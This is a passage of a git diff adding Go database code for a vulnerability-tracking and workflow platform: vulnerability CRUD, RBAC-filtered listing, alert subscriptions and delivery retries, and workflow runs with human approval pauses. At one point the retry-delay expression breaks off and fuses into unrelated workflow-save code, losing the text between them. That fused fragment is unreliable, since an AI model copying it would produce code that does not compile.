`json:"task_queue_id,omitempty"` + Title string `json:"title"` + Description string `json:"description"` + Severity string `json:"severity"` // critical, high, medium, low, info + Status string `json:"status"` // open, confirmed, fixed, false_positive, ignored + Type string `json:"type"` + Target string `json:"target"` + Preconditions string `json:"preconditions"` + ReproSteps string `json:"reproduction_steps"` + Evidence string `json:"evidence"` + Impact string `json:"impact"` + Recommendation string `json:"recommendation"` + RetestNotes string `json:"retest_notes"` + CreatedAt time.Time `json:"created_at"` + UpdatedAt time.Time `json:"updated_at"` +} + +// CreateVulnerability 创建漏洞 +func (db *DB) CreateVulnerability(vuln *Vulnerability) (*Vulnerability, error) { + if vuln.ID == "" { + vuln.ID = uuid.New().String() + } + if vuln.Status == "" { + vuln.Status = "open" + } + now := time.Now() + if vuln.CreatedAt.IsZero() { + vuln.CreatedAt = now + } + vuln.UpdatedAt = now + + if strings.TrimSpace(vuln.ProjectID) == "" && vuln.ConversationID != "" { + if pid, err := db.GetConversationProjectID(vuln.ConversationID); err == nil { + vuln.ProjectID = pid + } + } + + query := ` + INSERT INTO vulnerabilities ( + id, conversation_id, project_id, conversation_tag, task_tag, title, description, severity, status, + vulnerability_type, target, preconditions, reproduction_steps, evidence, impact, recommendation, retest_notes, + created_at, updated_at + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + + _, err := db.Exec( + query, + vuln.ID, nullIfEmpty(vuln.ConversationID), nullIfEmpty(vuln.ProjectID), vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description, + vuln.Severity, vuln.Status, vuln.Type, vuln.Target, + vuln.Preconditions, vuln.ReproSteps, vuln.Evidence, vuln.Impact, vuln.Recommendation, vuln.RetestNotes, + vuln.CreatedAt, vuln.UpdatedAt, + ) + if err != nil { + return nil, fmt.Errorf("创建漏洞失败: %w", err) + } + db.refreshAssetRiskCacheForConversationsBestEffort(vuln.ConversationID) + return vuln, nil +} + +// GetVulnerability 获取漏洞 +func (db *DB) GetVulnerability(id string) (*Vulnerability, error) { + var vuln Vulnerability + query := ` + SELECT id, COALESCE(conversation_id,''), COALESCE(project_id,''), title, description, severity, status, + conversation_tag, task_tag, vulnerability_type, target, + COALESCE(preconditions,''), COALESCE(reproduction_steps,''), COALESCE(evidence,''), + impact, recommendation, COALESCE(retest_notes,''), + COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id, + COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id, + created_at, updated_at + FROM vulnerabilities + WHERE id = ? + ` + + err := db.QueryRow(query, id).Scan( + &vuln.ID, &vuln.ConversationID, &vuln.ProjectID, &vuln.Title, &vuln.Description, + &vuln.Severity, &vuln.Status, &vuln.ConversationTag, &vuln.TaskTag, &vuln.Type, &vuln.Target, + &vuln.Preconditions, &vuln.ReproSteps, &vuln.Evidence, &vuln.Impact, &vuln.Recommendation, &vuln.RetestNotes, + &vuln.TaskID, &vuln.TaskQueueID, + &vuln.CreatedAt, &vuln.UpdatedAt, + ) + if err != nil { + if err == sql.ErrNoRows { + return nil, fmt.Errorf("漏洞不存在") + } + return nil, fmt.Errorf("获取漏洞失败: %w", err) + } + + return &vuln, nil +} + +// ListVulnerabilities 列出漏洞 +func (db *DB) ListVulnerabilities(limit, offset int, filter VulnerabilityListFilter) ([]*Vulnerability, error) { + return db.ListVulnerabilitiesForAccess(limit, offset, filter, RBACListAccess{}) +} + +func (db *DB) ListVulnerabilitiesForAccess(limit, offset int, filter VulnerabilityListFilter, access RBACListAccess) ([]*Vulnerability, error) { + query := ` + SELECT id, COALESCE(conversation_id,''), COALESCE(project_id,''), title, description, severity, status, conversation_tag, task_tag, + vulnerability_type, target, + COALESCE(preconditions,''), COALESCE(reproduction_steps,''), COALESCE(evidence,''), + impact, recommendation, COALESCE(retest_notes,''), + COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id, + COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id, + created_at, updated_at + FROM vulnerabilities + WHERE 1=1 + ` + args := []interface{}{} + query, args = filter.appendWhere(query, args) + query, args = appendVulnerabilityAccessFilter(query, args, access) + + query += " ORDER BY created_at DESC LIMIT ? OFFSET ?" + args = append(args, limit, offset) + + rows, err := db.Query(query, args...) + if err != nil { + return nil, fmt.Errorf("查询漏洞列表失败: %w", err) + } + defer rows.Close() + + var vulnerabilities []*Vulnerability + for rows.Next() { + var vuln Vulnerability + err := rows.Scan( + &vuln.ID, &vuln.ConversationID, &vuln.ProjectID, &vuln.Title, &vuln.Description, + &vuln.Severity, &vuln.Status, &vuln.ConversationTag, &vuln.TaskTag, &vuln.Type, &vuln.Target, + &vuln.Preconditions, &vuln.ReproSteps, &vuln.Evidence, &vuln.Impact, &vuln.Recommendation, &vuln.RetestNotes, + &vuln.TaskID, &vuln.TaskQueueID, + &vuln.CreatedAt, &vuln.UpdatedAt, + ) + if err != nil { + db.logger.Warn("扫描漏洞记录失败", zap.Error(err)) + continue + } + vulnerabilities = append(vulnerabilities, &vuln) + } + + return vulnerabilities, nil +} + +// CountVulnerabilities 统计漏洞总数(支持筛选条件) +func (db *DB) CountVulnerabilities(filter VulnerabilityListFilter) (int, error) { + return db.CountVulnerabilitiesForAccess(filter, RBACListAccess{}) +} + +func (db *DB) CountVulnerabilitiesForAccess(filter VulnerabilityListFilter, access RBACListAccess) (int, error) { + query := "SELECT COUNT(*) FROM vulnerabilities WHERE 1=1" + args := []interface{}{} + query, args = filter.appendWhere(query, args) + query, args = appendVulnerabilityAccessFilter(query, args, access) + + var count int + err := db.QueryRow(query, args...).Scan(&count) + if err != nil { + return 0, fmt.Errorf("统计漏洞总数失败: %w", err) + } + + return count, nil +} + +// UpdateVulnerability 更新漏洞 +func (db *DB) UpdateVulnerability(id string, vuln *Vulnerability) error { + vuln.UpdatedAt = time.Now() + var oldConversationID string + _ = db.QueryRow(`SELECT COALESCE(conversation_id,'') FROM vulnerabilities WHERE id = ?`, id).Scan(&oldConversationID) + + query := ` + UPDATE vulnerabilities + SET project_id = ?, conversation_tag = ?, task_tag = ?, title = ?, description = ?, severity = ?, status = ?, + vulnerability_type = ?, target = ?, preconditions = ?, reproduction_steps = ?, evidence = ?, impact = ?, + recommendation = ?, retest_notes = ?, updated_at = ? + WHERE id = ? + ` + + _, err := db.Exec( + query, + nullIfEmpty(vuln.ProjectID), vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description, vuln.Severity, vuln.Status, + vuln.Type, vuln.Target, vuln.Preconditions, vuln.ReproSteps, vuln.Evidence, vuln.Impact, + vuln.Recommendation, vuln.RetestNotes, vuln.UpdatedAt, id, + ) + if err != nil { + return fmt.Errorf("更新漏洞失败: %w", err) + } + + db.refreshAssetRiskCacheForConversationsBestEffort(oldConversationID, vuln.ConversationID) + return nil +} + +// DeleteVulnerabilitiesByFilter 按筛选条件批量删除漏洞,返回实际删除条数 +func (db *DB) DeleteVulnerabilitiesByFilter(filter VulnerabilityListFilter) (int64, error) { + return db.DeleteVulnerabilitiesByFilterForAccess(filter, RBACListAccess{}) +} + +func (db *DB) DeleteVulnerabilitiesByFilterForAccess(filter VulnerabilityListFilter, access RBACListAccess) (int64, error) { + tx, err := db.Begin() + if err != nil { + return 0, fmt.Errorf("开启事务失败: %w", err) + } + defer func() { _ = tx.Rollback() }() + + where := "WHERE 1=1" + args := []interface{}{} + where, args = filter.appendWhere(where, args) + where, args = appendVulnerabilityAccessFilter(where, args, access) + affectedConversations, err := collectVulnerabilityConversationIDs(tx, where, args) + if err != nil { + return 0, err + } + + clearQuery := `UPDATE project_facts SET related_vulnerability_id = NULL + WHERE related_vulnerability_id IN (SELECT id FROM vulnerabilities ` + where + `)` + if _, err := tx.Exec(clearQuery, args...); err != nil { + return 0, fmt.Errorf("清理事实漏洞关联失败: %w", err) + } + + deleteQuery := `DELETE FROM vulnerabilities ` + where + result, err := tx.Exec(deleteQuery, args...) + if err != nil { + return 0, fmt.Errorf("批量删除漏洞失败: %w", err) + } + deleted, err := result.RowsAffected() + if err != nil { + return 0, fmt.Errorf("获取删除条数失败: %w", err) + } + if err := tx.Commit(); err != nil { + return 0, fmt.Errorf("提交事务失败: %w", err) + } + db.refreshAssetRiskCacheForConversationsBestEffort(affectedConversations...) + return deleted, nil +} + +// DeleteVulnerability 删除漏洞 +func (db *DB) DeleteVulnerability(id string) error { + tx, err := db.Begin() + if err != nil { + return fmt.Errorf("开启事务失败: %w", err) + } + defer func() { _ = tx.Rollback() }() + var conversationID string + _ = tx.QueryRow(`SELECT COALESCE(conversation_id,'') FROM vulnerabilities WHERE id = ?`, id).Scan(&conversationID) + + // 删除漏洞前先解除项目事实中的关联,避免前端继续显示已删除漏洞的短 ID。 + if _, err := tx.Exec("UPDATE project_facts SET related_vulnerability_id = NULL WHERE related_vulnerability_id = ?", id); err != nil { + return fmt.Errorf("清理事实漏洞关联失败: %w", err) + } + if _, err := tx.Exec("DELETE FROM vulnerabilities WHERE id = ?", id); err != nil { + return fmt.Errorf("删除漏洞失败: %w", err) + } + if err := tx.Commit(); err != nil { + return fmt.Errorf("提交事务失败: %w", err) + } + db.refreshAssetRiskCacheForConversationsBestEffort(conversationID) + return nil +} + +func collectVulnerabilityConversationIDs(tx *sql.Tx, where string, args []interface{}) ([]string, error) { + rows, err := tx.Query(`SELECT DISTINCT COALESCE(conversation_id,'') FROM vulnerabilities `+where, args...) + if err != nil { + return nil, fmt.Errorf("查询受影响漏洞会话失败: %w", err) + } + defer rows.Close() + ids := []string{} + for rows.Next() { + var id string + if err := rows.Scan(&id); err != nil { + return nil, err + } + if strings.TrimSpace(id) != "" { + ids = append(ids, id) + } + } + return ids, rows.Err() +} + +// GetVulnerabilityStats 获取漏洞统计(筛选条件与 ListVulnerabilities / CountVulnerabilities 一致) +func (db *DB) GetVulnerabilityStats(filter VulnerabilityListFilter) (map[string]interface{}, error) { + return db.GetVulnerabilityStatsForAccess(filter, RBACListAccess{}) +} + +func (db *DB) GetVulnerabilityStatsForAccess(filter VulnerabilityListFilter, access RBACListAccess) (map[string]interface{}, error) { + stats := make(map[string]interface{}) + + where := "WHERE 1=1" + args := []interface{}{} + where, args = filter.appendWhere(where, args) + where, args = appendVulnerabilityAccessFilter(where, args, access) + + // 总漏洞数 + var totalCount int + query := "SELECT COUNT(*) FROM vulnerabilities " + where + err := db.QueryRow(query, args...).Scan(&totalCount) + if err != nil { + return nil, fmt.Errorf("获取总漏洞数失败: %w", err) + } + stats["total"] = totalCount + + // 按严重程度统计 + severityQuery := "SELECT severity, COUNT(*) FROM vulnerabilities " + where + " GROUP BY severity" + + rows, err := db.Query(severityQuery, args...) + if err != nil { + return nil, fmt.Errorf("获取严重程度统计失败: %w", err) + } + defer rows.Close() + + severityStats := make(map[string]int) + for rows.Next() { + var severity string + var count int + if err := rows.Scan(&severity, &count); err != nil { + continue + } + severityStats[severity] = count + } + stats["by_severity"] = severityStats + + // 按状态统计 + statusQuery := "SELECT status, COUNT(*) FROM vulnerabilities " + where + " GROUP BY status" + + rows, err = db.Query(statusQuery, args...) + if err != nil { + return nil, fmt.Errorf("获取状态统计失败: %w", err) + } + defer rows.Close() + + statusStats := make(map[string]int) + for rows.Next() { + var status string + var count int + if err := rows.Scan(&status, &count); err != nil { + continue + } + statusStats[status] = count + } + stats["by_status"] = statusStats + + return stats, nil +} + +// GetVulnerabilityFilterOptions 获取漏洞筛选建议项 +func (db *DB) GetVulnerabilityFilterOptions() (map[string][]string, error) { + return db.GetVulnerabilityFilterOptionsForAccess(RBACListAccess{}) +} + +func (db *DB) GetVulnerabilityFilterOptionsForAccess(access RBACListAccess) (map[string][]string, error) { + collect := func(query string, args ...interface{}) ([]string, error) { + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + items := make([]string, 0) + for rows.Next() { + var val string + if err := rows.Scan(&val); err != nil { + continue + } + if val == "" { + continue + } + items = append(items, val) + } + return items, nil + } + + where := "WHERE 1=1" + accessArgs := []interface{}{} + where, accessArgs = appendVulnerabilityAccessFilter(where, accessArgs, access) + + vulnIDs, err := collect(`SELECT DISTINCT id FROM vulnerabilities `+where+` ORDER BY created_at DESC LIMIT 500`, accessArgs...) + if err != nil { + return nil, fmt.Errorf("查询漏洞ID建议失败: %w", err) + } + conversationIDs, err := collect(`SELECT DISTINCT conversation_id FROM vulnerabilities `+where+` AND conversation_id IS NOT NULL AND conversation_id <> '' ORDER BY created_at DESC LIMIT 500`, accessArgs...) + if err != nil { + return nil, fmt.Errorf("查询会话ID建议失败: %w", err) + } + taskIDs, err := collect(`SELECT DISTINCT bt.id FROM batch_tasks bt JOIN vulnerabilities ON bt.conversation_id = vulnerabilities.conversation_id `+where+` AND bt.id <> '' ORDER BY bt.rowid DESC LIMIT 500`, accessArgs...) + if err != nil { + return nil, fmt.Errorf("查询任务ID建议失败: %w", err) + } + queueIDs, err := collect(`SELECT DISTINCT bt.queue_id FROM batch_tasks bt JOIN vulnerabilities ON bt.conversation_id = vulnerabilities.conversation_id `+where+` AND bt.queue_id <> '' ORDER BY bt.rowid DESC LIMIT 500`, accessArgs...) + if err != nil { + return nil, fmt.Errorf("查询队列ID建议失败: %w", err) + } + conversationTags, err := collect(`SELECT DISTINCT conversation_tag FROM vulnerabilities `+where+` AND conversation_tag IS NOT NULL AND conversation_tag <> '' ORDER BY conversation_tag LIMIT 500`, accessArgs...) + if err != nil { + return nil, fmt.Errorf("查询对话标签建议失败: %w", err) + } + taskTags, err := collect(`SELECT DISTINCT task_tag FROM vulnerabilities `+where+` AND task_tag IS NOT NULL AND task_tag <> '' ORDER BY task_tag LIMIT 500`, accessArgs...) + if err != nil { + return nil, fmt.Errorf("查询任务标签建议失败: %w", err) + } + projectIDs, err := collect(`SELECT DISTINCT project_id FROM vulnerabilities `+where+` AND project_id IS NOT NULL AND project_id <> '' ORDER BY created_at DESC LIMIT 200`, accessArgs...) + if err != nil { + return nil, fmt.Errorf("查询项目ID建议失败: %w", err) + } + + return map[string][]string{ + "vulnerability_ids": vulnIDs, + "conversation_ids": conversationIDs, + "project_ids": projectIDs, + "task_ids": taskIDs, + "queue_ids": queueIDs, + "conversation_tags": conversationTags, + "task_tags": taskTags, + }, nil +} diff --git a/internal/database/vulnerability_alert.go b/internal/database/vulnerability_alert.go new file mode 100644 index 00000000..23a5b760 --- /dev/null +++ b/internal/database/vulnerability_alert.go @@ -0,0 +1,215 @@ +package database + +import ( + "database/sql" + "fmt" + "strings" + "time" +) + +// VulnerabilityAlertSubscription is the single source of truth shared by Web +// settings and robot commands. Alerts are opt-in and user scoped. +type VulnerabilityAlertSubscription struct { + UserID string `json:"user_id"` + Enabled bool `json:"enabled"` + MinSeverity string `json:"min_severity"` + CreatedAt time.Time `json:"created_at"` + UpdatedAt time.Time `json:"updated_at"` +} + +type VulnerabilityAlertRecipient struct { + UserID string + Platform string + ExternalUserID string +} + +type VulnerabilityAlertDelivery struct { + ID int64 + Vulnerability *Vulnerability + UserID string + Platform string + ExternalUserID string + Attempts int +} + +var vulnerabilitySeverityRank = map[string]int{ + "info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4, +} + +func NormalizeVulnerabilityAlertSeverity(value string) (string, error) { + value = strings.ToLower(strings.TrimSpace(value)) + if value == "" { + value = "high" + } + if _, ok := vulnerabilitySeverityRank[value]; !ok { + return "", fmt.Errorf("invalid minimum severity %q", value) + } + return value, nil +} + +func (db *DB) GetVulnerabilityAlertSubscription(userID string) (*VulnerabilityAlertSubscription, error) { + userID = strings.TrimSpace(userID) + var sub VulnerabilityAlertSubscription + var enabled int + var createdAt, updatedAt string + err := db.QueryRow(`SELECT user_id, enabled, min_severity, created_at, updated_at + FROM vulnerability_alert_subscriptions WHERE user_id = ?`, userID). + Scan(&sub.UserID, &enabled, &sub.MinSeverity, &createdAt, &updatedAt) + if err == sql.ErrNoRows { + now := time.Now() + return &VulnerabilityAlertSubscription{UserID: userID, MinSeverity: "high", CreatedAt: now, UpdatedAt: now}, nil + } + if err != nil { + return nil, err + } + sub.Enabled = enabled != 0 + sub.CreatedAt = parseDBTime(createdAt) + sub.UpdatedAt = parseDBTime(updatedAt) + return &sub, nil +} + +func (db *DB) UpsertVulnerabilityAlertSubscription(userID string, enabled bool, minSeverity string) (*VulnerabilityAlertSubscription, error) { + userID = strings.TrimSpace(userID) + if userID == "" { + return nil, fmt.Errorf("user id is required") + } + severity, err := NormalizeVulnerabilityAlertSeverity(minSeverity) + if err != nil { + return nil, err + } + now := time.Now() + _, err = db.Exec(`INSERT INTO vulnerability_alert_subscriptions + (user_id, enabled, min_severity, created_at, updated_at) VALUES (?, ?, ?, ?, ?) + ON CONFLICT(user_id) DO UPDATE SET enabled = excluded.enabled, + min_severity = excluded.min_severity, updated_at = excluded.updated_at`, + userID, boolToInt(enabled), severity, now, now) + if err != nil { + return nil, err + } + return db.GetVulnerabilityAlertSubscription(userID) +} + +// ListVulnerabilityAlertRecipients applies the same RBAC ownership/assignment +// boundaries as the vulnerability list, then expands only enabled robot bindings. +func (db *DB) ListVulnerabilityAlertRecipients(vuln *Vulnerability) ([]VulnerabilityAlertRecipient, error) { + if vuln == nil { + return nil, nil + } + rank, ok := vulnerabilitySeverityRank[strings.ToLower(strings.TrimSpace(vuln.Severity))] + if !ok { + return nil, nil + } + rows, err := db.Query(` + SELECT DISTINCT s.user_id, b.platform, b.external_user_id, s.min_severity + FROM vulnerability_alert_subscriptions s + JOIN rbac_users u ON u.id = s.user_id AND u.enabled = 1 + JOIN robot_user_bindings b ON b.rbac_user_id = s.user_id AND b.enabled = 1 + WHERE s.enabled = 1 AND ( + EXISTS (SELECT 1 FROM vulnerabilities v WHERE v.id = ? AND v.owner_user_id = s.user_id) + OR EXISTS (SELECT 1 FROM rbac_resource_assignments ra WHERE ra.user_id = s.user_id AND ra.resource_type = 'vulnerability' AND ra.resource_id = ?) + OR (? <> '' AND (EXISTS (SELECT 1 FROM projects p WHERE p.id = ? AND p.owner_user_id = s.user_id) + OR EXISTS (SELECT 1 FROM rbac_resource_assignments pra WHERE pra.user_id = s.user_id AND pra.resource_type = 'project' AND pra.resource_id = ?))) + OR (? <> '' AND (EXISTS (SELECT 1 FROM conversations c WHERE c.id = ? AND c.owner_user_id = s.user_id) + OR EXISTS (SELECT 1 FROM rbac_resource_assignments cra WHERE cra.user_id = s.user_id AND cra.resource_type = 'conversation' AND cra.resource_id = ?))) + )`, vuln.ID, vuln.ID, vuln.ProjectID, vuln.ProjectID, vuln.ProjectID, + vuln.ConversationID, vuln.ConversationID, vuln.ConversationID) + if err != nil { + return nil, err + } + defer rows.Close() + out := make([]VulnerabilityAlertRecipient, 0) + for rows.Next() { + var recipient VulnerabilityAlertRecipient + var minimum string + if err := rows.Scan(&recipient.UserID, &recipient.Platform, &recipient.ExternalUserID, &minimum); err != nil { + return nil, err + } + if rank >= vulnerabilitySeverityRank[minimum] { + out = append(out, recipient) + } + } + return out, rows.Err() +} + +func (db *DB) SetVulnerabilityCreatedHook(hook func(*Vulnerability)) { + db.vulnerabilityCreatedHook = hook +} + +// NotifyVulnerabilityCreated must be called after resource ownership has been +// committed. Delivery runs asynchronously and never delays the write path. +func (db *DB) NotifyVulnerabilityCreated(vulnerability *Vulnerability) { + if db == nil || vulnerability == nil || db.vulnerabilityCreatedHook == nil { + return + } + created := *vulnerability + go db.vulnerabilityCreatedHook(&created) +} + +func (db *DB) EnqueueVulnerabilityAlertDeliveries(vulnerabilityID string, recipients []VulnerabilityAlertRecipient) error { + now := time.Now() + tx, err := db.Begin() + if err != nil { + return err + } + defer func() { _ = tx.Rollback() }() + for _, r := range recipients { + if _, err := tx.Exec(`INSERT INTO vulnerability_alert_deliveries + (vulnerability_id, user_id, platform, external_user_id, status, attempts, next_attempt_at, created_at, updated_at) + VALUES (?, ?, ?, ?, 'pending', 0, ?, ?, ?) + ON CONFLICT(vulnerability_id, platform, external_user_id) DO NOTHING`, + vulnerabilityID, r.UserID, r.Platform, r.ExternalUserID, now, now, now); err != nil { + return err + } + } + return tx.Commit() +} + +func (db *DB) ListDueVulnerabilityAlertDeliveries(limit int) ([]VulnerabilityAlertDelivery, error) { + if limit <= 0 || limit > 100 { + limit = 50 + } + rows, err := db.Query(`SELECT d.id, d.user_id, d.platform, d.external_user_id, d.attempts, + v.id, COALESCE(v.conversation_id,''), COALESCE(v.project_id,''), v.title, COALESCE(v.description,''), + v.severity, v.status, COALESCE(v.vulnerability_type,''), COALESCE(v.target,''), + COALESCE(v.impact,''), COALESCE(v.recommendation,''), v.created_at, v.updated_at + FROM vulnerability_alert_deliveries d JOIN vulnerabilities v ON v.id = d.vulnerability_id + WHERE d.status IN ('pending','retry') AND d.next_attempt_at <= ? + ORDER BY d.next_attempt_at, d.id LIMIT ?`, time.Now(), limit) + if err != nil { + return nil, err + } + defer rows.Close() + var out []VulnerabilityAlertDelivery + for rows.Next() { + var d VulnerabilityAlertDelivery + v := &Vulnerability{} + if err := rows.Scan(&d.ID, &d.UserID, &d.Platform, &d.ExternalUserID, &d.Attempts, + &v.ID, &v.ConversationID, &v.ProjectID, &v.Title, &v.Description, &v.Severity, &v.Status, + &v.Type, &v.Target, &v.Impact, &v.Recommendation, &v.CreatedAt, &v.UpdatedAt); err != nil { + return nil, err + } + d.Vulnerability = v + out = append(out, d) + } + return out, rows.Err() +} + +func (db *DB) MarkVulnerabilityAlertDeliverySent(id int64) error { + _, err := db.Exec(`UPDATE vulnerability_alert_deliveries SET status='sent', attempts=attempts+1, last_error='', updated_at=? WHERE id=?`, time.Now(), id) + return err +} + +func (db *DB) MarkVulnerabilityAlertDeliveryFailed(id int64, attempts int, sendErr error) error { + status := "retry" + if attempts >= 5 { + status = "failed" + } + delay := time.Minute * time.Duration(1< existing.Version { + nextVersion = wf.Version + } + _, err = db.Exec( + `UPDATE workflow_definitions + SET name = ?, description = ?, version = ?, graph_json = ?, enabled = ?, updated_at = ? + WHERE id = ?`, + wf.Name, wf.Description, nextVersion, wf.GraphJSON, boolToInt(wf.Enabled), now, wf.ID, + ) + } + if err != nil { + return fmt.Errorf("保存工作流失败: %w", err) + } + return nil +} + +func (db *DB) DeleteWorkflowDefinition(id string) error { + id = strings.TrimSpace(id) + if id == "" { + return fmt.Errorf("工作流 id 不能为空") + } + if _, err := db.Exec("DELETE FROM workflow_definitions WHERE id = ?", id); err != nil { + return fmt.Errorf("删除工作流失败: %w", err) + } + return nil +} + +func (db *DB) CreateWorkflowRun(run *WorkflowRun) error { + if run == nil { + return fmt.Errorf("工作流运行为空") + } + if strings.TrimSpace(run.ID) == "" || strings.TrimSpace(run.WorkflowID) == "" { + return fmt.Errorf("工作流运行 id 和 workflow_id 不能为空") + } + if run.WorkflowVersion <= 0 { + run.WorkflowVersion = 1 + } + if strings.TrimSpace(run.Status) == "" { + run.Status = "running" + } + if run.StartedAt.IsZero() { + run.StartedAt = time.Now() + } + _, err := db.Exec( + `INSERT INTO workflow_runs (id, workflow_id, workflow_version, conversation_id, project_id, role_id, status, input_json, started_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)`, + run.ID, run.WorkflowID, run.WorkflowVersion, nullString(run.ConversationID), nullString(run.ProjectID), nullString(run.RoleID), run.Status, run.InputJSON, run.StartedAt, + ) + if err != nil { + return fmt.Errorf("创建工作流运行失败: %w", err) + } + return nil +} + +func (db *DB) FinishWorkflowRun(runID, status, outputJSON, errText string) error { + runID = strings.TrimSpace(runID) + if runID == "" { + return fmt.Errorf("工作流运行 id 不能为空") + } + if strings.TrimSpace(status) == "" { + status = "completed" + } + now := time.Now() + _, err := db.Exec( + `UPDATE workflow_runs SET status = ?, output_json = ?, error = ?, finished_at = ? WHERE id = ?`, + status, outputJSON, errText, now, runID, + ) + if err != nil { + return fmt.Errorf("更新工作流运行失败: %w", err) + } + return nil +} + +func (db *DB) CreateWorkflowNodeRun(n *WorkflowNodeRun) error { + if n == nil { + return fmt.Errorf("工作流节点运行为空") + } + if strings.TrimSpace(n.ID) == "" || strings.TrimSpace(n.RunID) == "" || strings.TrimSpace(n.NodeID) == "" { + return fmt.Errorf("节点运行 id、run_id 和 node_id 不能为空") + } + if strings.TrimSpace(n.Status) == "" { + n.Status = "running" + } + if n.StartedAt.IsZero() { + n.StartedAt = time.Now() + } + _, err := db.Exec( + `INSERT INTO workflow_node_runs (id, run_id, node_id, status, input_json, started_at) + VALUES (?, ?, ?, ?, ?, ?)`, + n.ID, n.RunID, n.NodeID, n.Status, n.InputJSON, n.StartedAt, + ) + if err != nil { + return fmt.Errorf("创建工作流节点运行失败: %w", err) + } + return nil +} + +func (db *DB) FinishWorkflowNodeRun(nodeRunID, status, outputJSON, errText string) error { + nodeRunID = strings.TrimSpace(nodeRunID) + if nodeRunID == "" { + return fmt.Errorf("节点运行 id 不能为空") + } + if strings.TrimSpace(status) == "" { + status = "completed" + } + now := time.Now() + _, err := db.Exec( + `UPDATE workflow_node_runs SET status = ?, output_json = ?, error = ?, finished_at = ? WHERE id = ?`, + status, outputJSON, errText, now, nodeRunID, + ) + if err != nil { + return fmt.Errorf("更新工作流节点运行失败: %w", err) + } + return nil +} + +func (db *DB) ListWorkflowNodeRuns(runID string) ([]*WorkflowNodeRun, error) { + runID = strings.TrimSpace(runID) + if runID == "" { + return nil, fmt.Errorf("工作流运行 id 不能为空") + } + rows, err := db.Query( + `SELECT id, run_id, node_id, status, input_json, output_json, error, started_at, finished_at + FROM workflow_node_runs WHERE run_id = ? ORDER BY started_at ASC`, + runID, + ) + if err != nil { + return nil, fmt.Errorf("查询工作流节点运行失败: %w", err) + } + defer rows.Close() + var out []*WorkflowNodeRun + for rows.Next() { + row, err := scanWorkflowNodeRun(rows) + if err != nil { + return nil, err + } + out = append(out, row) + } + return out, rows.Err() +} + +func scanWorkflowRun(scanner interface { + Scan(dest ...interface{}) error +}) (*WorkflowRun, error) { + var row WorkflowRun + var convID, projectID, roleID, inputJSON, outputJSON, errText, pendingNode, pendingJSON sql.NullString + var finishedAt sql.NullTime + if err := scanner.Scan( + &row.ID, &row.WorkflowID, &row.WorkflowVersion, + &convID, &projectID, &roleID, &row.Status, + &inputJSON, &outputJSON, &errText, + &pendingNode, &pendingJSON, + &row.StartedAt, &finishedAt, + ); err != nil { + return nil, err + } + row.ConversationID = convID.String + row.ProjectID = projectID.String + row.RoleID = roleID.String + row.InputJSON = inputJSON.String + row.OutputJSON = outputJSON.String + row.Error = errText.String + row.PendingHITLNodeID = pendingNode.String + row.PendingHITLJSON = pendingJSON.String + if finishedAt.Valid { + t := finishedAt.Time + row.FinishedAt = &t + } + return &row, nil +} + +const workflowRunColumns = `id, workflow_id, workflow_version, conversation_id, project_id, role_id, status, input_json, output_json, error, pending_hitl_node_id, pending_hitl_json, started_at, finished_at` + +func (db *DB) GetWorkflowRun(runID string) (*WorkflowRun, error) { + runID = strings.TrimSpace(runID) + if runID == "" { + return nil, nil + } + row, err := scanWorkflowRun(db.QueryRow("SELECT "+workflowRunColumns+" FROM workflow_runs WHERE id = ?", runID)) + if err == sql.ErrNoRows { + return nil, nil + } + if err != nil { + return nil, fmt.Errorf("查询工作流运行失败: %w", err) + } + return row, nil +} + +func (db *DB) SetWorkflowRunStatus(runID, status string) error { + runID = strings.TrimSpace(runID) + if runID == "" { + return fmt.Errorf("工作流运行 id 不能为空") + } + _, err := db.Exec(`UPDATE workflow_runs SET status = ? WHERE id = ?`, strings.TrimSpace(status), runID) + if err != nil { + return fmt.Errorf("更新工作流运行状态失败: %w", err) + } + return nil +} + +func (db *DB) SetWorkflowRunAwaitingHITL(runID, nodeID, pendingJSON string) error { + runID = strings.TrimSpace(runID) + if runID == "" { + return fmt.Errorf("工作流运行 id 不能为空") + } + _, err := db.Exec( + `UPDATE workflow_runs SET status = 'awaiting_hitl', pending_hitl_node_id = ?, pending_hitl_json = ?, finished_at = NULL WHERE id = ?`, + strings.TrimSpace(nodeID), pendingJSON, runID, + ) + if err != nil { + return fmt.Errorf("更新工作流 HITL 等待状态失败: %w", err) + } + return nil +} + +// RecordWorkflowRunHITLDecision stores a human decision on a paused workflow run. +func (db *DB) RecordWorkflowRunHITLDecision(runID string, approved bool, comment string) error { + runID = strings.TrimSpace(runID) + if runID == "" { + return fmt.Errorf("工作流运行 id 不能为空") + } + run, err := db.GetWorkflowRun(runID) + if err != nil { + return err + } + if run == nil { + return fmt.Errorf("工作流运行不存在") + } + pending := map[string]interface{}{} + if strings.TrimSpace(run.PendingHITLJSON) != "" { + _ = json.Unmarshal([]byte(run.PendingHITLJSON), &pending) + } + if approved { + pending["decision"] = "approved" + } else { + pending["decision"] = "rejected" + } + pending["comment"] = strings.TrimSpace(comment) + raw, _ := json.Marshal(pending) + _, err = db.Exec( + `UPDATE workflow_runs SET pending_hitl_json = ? WHERE id = ? AND status = 'awaiting_hitl'`, + string(raw), runID, + ) + if err != nil { + return fmt.Errorf("记录工作流审批决定失败: %w", err) + } + return nil +} + +func (db *DB) ListWorkflowRunsAwaitingHITL(limit int) ([]*WorkflowRun, error) { + return db.ListWorkflowRunsAwaitingHITLFiltered("", limit) +} + +// ListWorkflowRunsAwaitingHITLFiltered returns awaiting_hitl runs, optionally scoped to a conversation. +func (db *DB) ListWorkflowRunsAwaitingHITLFiltered(conversationID string, limit int) ([]*WorkflowRun, error) { + if limit <= 0 { + limit = 50 + } + conversationID = strings.TrimSpace(conversationID) + var rows *sql.Rows + var err error + if conversationID != "" { 